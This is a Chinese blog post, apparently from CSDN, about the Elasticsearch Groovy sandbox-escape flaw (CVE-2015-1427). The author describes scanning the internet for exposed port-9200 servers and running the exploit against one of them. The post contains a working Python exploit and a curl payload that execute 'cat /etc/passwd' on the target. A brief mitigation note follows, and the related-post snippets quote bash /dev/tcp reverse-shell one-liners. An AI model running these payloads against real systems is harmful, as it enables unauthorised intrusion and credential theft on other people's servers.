ElasticSearch Groovy脚本远程代码执行漏洞

最新推荐文章于 2024-03-05 09:04:32 发布
最新推荐文章于 2024-03-05 09:04:32 发布
阅读量152 收藏
点赞数
文章标签: java 大数据 json
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34060741/article/details/85115376
版权

什么是ElasticSearch?

它是一种分布式的、实时性的、由JAVA开发的搜索和分析引擎。

2014年,曾经被曝出过一个远程代码执行漏洞(CVE-2014-3120),漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,***者可以通过MVEL构造执行任意java代码,后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远程代码执行任意命令。。。“任意”你懂的,比如:利用nc反弹shell。Groovy是一种运行在JVM上的脚本语言,语法和java很像,同样可以调用java中的各种对象和方法,但是Groovy的语法更简单。


先用zmap扫一下。。。。真的有很多是在公网上的,虽然服务器是内网但是9200端口被映射了出来。。。

wKioL1T4ariAltomAAiGHBa3bgw430.jpg

从结果中找随便找一个,先用firefox看看,浏览器以post方式提交pocwKiom1T4aq6S0j6gAAh34ECscNM635.jpg

觉得麻烦就用python写了一个。。。为了演示,没带批量功能。。。

wKiom1T4ay3xVonoAAOWViJZ8jE033.jpg

附上代码:(请勿用于非法目的)

import sys
import json
import requests

query = json.dumps({"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}})


url = sys.argv[1]
request = requests.post(url, data=query)

result = json.loads(request.text)['hits']['hits'][0]['fields']['exp']

for i in result[0]:
    print i


当然你用最简单的curl -XPOST命令也是可以

curl -XPOST http://ip:9200/_search?pretty=true -d '{"size":1,"script_fields": {"test#": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getInputStream())).readLines()","lang": "groovy"}}}'


wKiom1T-pHLBDfG9AAgqxx2hob8105.jpg

ElasticSearch的groovy引起的代码执行,很多国内安全厂商给出的建议是一升了之,但是很多装了插件的应用服务器,升级之后会造成插件不能访问,甚至导致业务中断,目前比较折衷的解决方案是修改配置文件,禁用groovy脚本,在配置文件中添加:script.groovy.sandbox.enabled: false,重启es服务。


Good Luck!

weixin_34060741
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427)
limb0的博客
11-22 539
Elasticsearch Groovy 脚本 远程代码执行(CVE-2015-1427) 一、漏洞介绍 由于 Groovy 脚本引擎中的不明缺陷,远程 Web 服务器上托管的 Elasticsearch 应用程序受到远程代码执行漏洞的影响。未经认证的远程攻击者使用特别构建的请求可从沙盒逃逸并执行任意 Java 代码。攻击成功可允许用户获取远程 shell 或操纵远程系统上的文件。 二、漏洞危害 ...
ElasticSearch Groovy远程代码执行漏洞(CVE-2015-1427)POC
asdfghjkl978564的博客
04-17 453
ElasticSearch是一个JAVA开发的搜索分析引擎. 2014年爆出的(CVE-2014-3120),由于搜索引擎支持使用脚本代码(MVEL)作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意Java代码,后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远程代码执行。 这次轮到的Groovy,影响版本是...
ElasticSearch Groovy脚本远程代码执行漏洞分析(CVE-2015-1427) (附exp)
xiaomin1991222的专栏
10-16 1118
ElasticSearch是一个JAVA开发的搜索分析引擎。 2014年,曾经被曝出过一个远程代码执行漏洞(CVE-2014-3120),漏洞出现在脚本查询模块,由于搜索引擎支持使用脚本代码(MVEL),作为表达式进行数据操作,攻击者可以通过MVEL构造执行任意java代码, 后来脚本语言引擎换成了Groovy,并且加入了沙盒进行控制,危险的代码会被拦截,结果这次由于沙盒限制的不严格,导致远...
【学习笔记】ElasticSearch Groovy 脚本远程代码执行漏洞(CVE-2015-1427)
chualam的博客
11-01 390
ES旧版本中使用MVEL作为脚本执行引擎 没有安全限制 因此可以构造任意java代码 CVE -2014 -3120 出了这个CVE后 又用groovy引擎了 防止恶意脚本执行 还用了沙盒的机制(因为沙盒限制不严格导致漏洞) CVE-2015-1427 沙盒通过黑白名单检测可以说它是浅沙盒 如果黑名单禁用a() 白名单有b() 就用b()调用a() 通过一个类获取另一个类 通过getclass方法获取class对象反射调用类 替代品forname 利用它来调用java.lang.runtim
Jenkins 任意文件读取(CVE-2024-23897)+后台用户密码提取哈希破解+反弹Shell 一条龙
最新发布
黑剑
03-05 4979
本文将深入研究一项涉及Jenkins的安全漏洞(CVE-2024–23897),将在实验室中介绍这些概念,这些技能对于渗透测试期间有效管理输出至关重要,而在本次漏洞利用中,更显得尤为关键。本文还涉及Jenkins凭证管理,针对Jenkins部署,指导参与者如何查找存储的用户和密码信息。更加刺激的是,我们将引导参与者使用Hashcat破解这些凭据,进一步揭露其中的安全挑战。实验的一大亮点是反向Shell测试,要求学员使用Jenkins内置的Groovy脚本控制台建立反向Shell。
ElasticSearch--使用groovy脚本
小毛贼_哪里逃
03-07 951
内置脚本实现自增操作 1 PUT accounts/person/12 { "age":0 } 2 GET accounts/person/12 返回: { "_index": "accounts", "_type": "person", "_id": "12", "_version": 2, "found": true, "_source": { ...
Elasticsearch Groovy 远程代码执行漏洞1
08-08
总结来说,Elasticsearch Groovy 远程代码执行漏洞是由于不安全的脚本执行环境和Groovy 动态语言的特性导致的。为了保护系统安全,管理员需要理解这些风险,并采取适当的措施来加强安全配置,包括限制脚本执行、及时...
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1
08-08
ElasticSearch 远程代码执行漏洞分析(CVE-2015-1427)&高级利用方法1 ElasticSearch 是一个基于 Lucene 的搜索引擎,提供了强大的搜索功能。然而,在 2015 年,一种远程代码执行漏洞(CVE-2015-1427)被发现,影响...
跨站脚本执行漏洞详解与防护
01-20
本文主要介绍跨站脚本执行漏洞的成因,形式,危害,利用方式,隐藏技巧,解决方法和常见问题 (FAQ),由于目前介绍跨站脚本执行漏洞的资料还不是很多,而且一般也不是很详细,所以希望本文能够 比较详细的介绍该...
Elasticsearch 开机自启脚本
10-14
`start` 用于启动Elasticsearch,这里使用 `su` 命令切换到指定的Elasticsearch用户(例如 `es-admin`),然后进入Elasticsearch的安装目录并执行 `bin/elasticsearch` 文件以后台模式启动服务。`stop` 通过查找并杀...
elasticsearch常用命令脚本
11-26
后端工程师开发时经常需要操作es,要是每次都去找相关命令就太麻烦了。这里提供了常用的es操作脚本,比如删除单个索引、删除多个索引、创建索引、查看全部索引、查看粉刺等等,以及深分页查询脚本
Elasticsearch使用Groovy脚本报错
兴国-为梦想而战
10-09 3996
在使用用Groovy脚本运行局部更新,例如: curl -XPOST 'http://localhost:9200/website/blog/1/_update' -d '{"script":"ctx._source.views+=1"}'结果会报错:{"error":"ElasticsearchIllegalArgumentException[failed to execute script];
反弹shell工具推荐
weixin_30861459的博客
02-21 871
Reverse Shell Cheat Sheet Bash TCP bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 &...
Elasticsearch Groovy任意命令执行漏洞EXP
Jiajia2017的博客
03-06 313
感谢:@lupin的分析(Elasticsearch Groovy 脚本动态执行漏洞分析和poc(CVE-2015-1427))本exp不一定正确,测试的站太少了,大家去测试测试。测试url:http://190.196.67.252:9200/_search?prettyhttp://191.234.18.14:9200///_search?pretty{"size":1,"...
ElasticSearch几个漏洞总结
热门推荐
u011066706的专栏
04-17 2万+
ElasticSearch远程命令执行(CVE-2014-3120) 漏洞介绍: ElasticSearch脚本执行(scripting)的功能,可以很方便地对查询出来的数据再加工处理。ElasticSearch用的脚本引擎是MVEL,这个引擎没有做任何的防护,或者沙盒包装,所以直接可以执行任意代码。 而在ElasticSearch 1.2之前的版本中,默认配置是打开动态脚本功能的,如
python反弹shell_反弹shell的几种方式总结
weixin_34653651的博客
01-15 4344
假设本机地址10.10.10.11,监听端口443。1、Bash环境下反弹TCP协议shell首先在本地监听TCP协议443端口nc-lvp443然后在靶机上执行如下命令:bash-i>&/dev/tcp/10.10.10.11/4430>&1/bin/bash-i>/dev/tcp/10.10.10.11/4430&1exec5&l...
ElasticSearch远程任意代码执行漏洞(CVE-2014-3120)分析
横云断岭的专栏
05-23 1万+
原理 这个漏洞实际上非常简单,ElasticSearch脚本执行(scripting)的功能,可以很方便地对查询出来的数据再加工处理。 ElasticSearch用的脚本引擎是MVEL,这个引擎没有做任何的防护,或者沙盒包装,所以直接可以执行任意代码。 而在ElasticSearch里,默认配置是打开动态脚本功能的,因此用户可以直接通过http请求,执行任意代码。 其实官方是清楚这个漏洞
记录自己常用的一些 Linux Shell 脚本
一叶不知秋
03-23 143
常要在 Linux 下分析日志或其他类型的文件,基本用的命令也就 grep, awk, sed, cut, vim, cat, find, xargs, tail, more 或 less。本人工作平台为 Mac OS X, 而 Mac 下的 grep, sed, awk 的行为与 Linux 下的 GNU 标准的相应命令是有差别的, 所以我总是在 Mac 下安装 GNU 的 grep, sed,...
Apache Log4j 远程代码执行漏洞(CVE-2021-44832) /elasticsearch-6.5.2
03-08
我可以回答这个问题。Apache Log4j 远程代码执行漏洞(CVE-2021-44832)是一种安全漏洞,可能允许攻击者远程执行恶意代码。该漏洞影响的版本包括 Log4j 2.-beta9 到 2.14.1,如果您使用这些版本的 Log4j,请尽快升级到最新版本。此外,如果您使用 Elasticsearch 6.5.2,请注意该版本中包含了受影响的 Log4j 版本,因此也需要进行升级。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值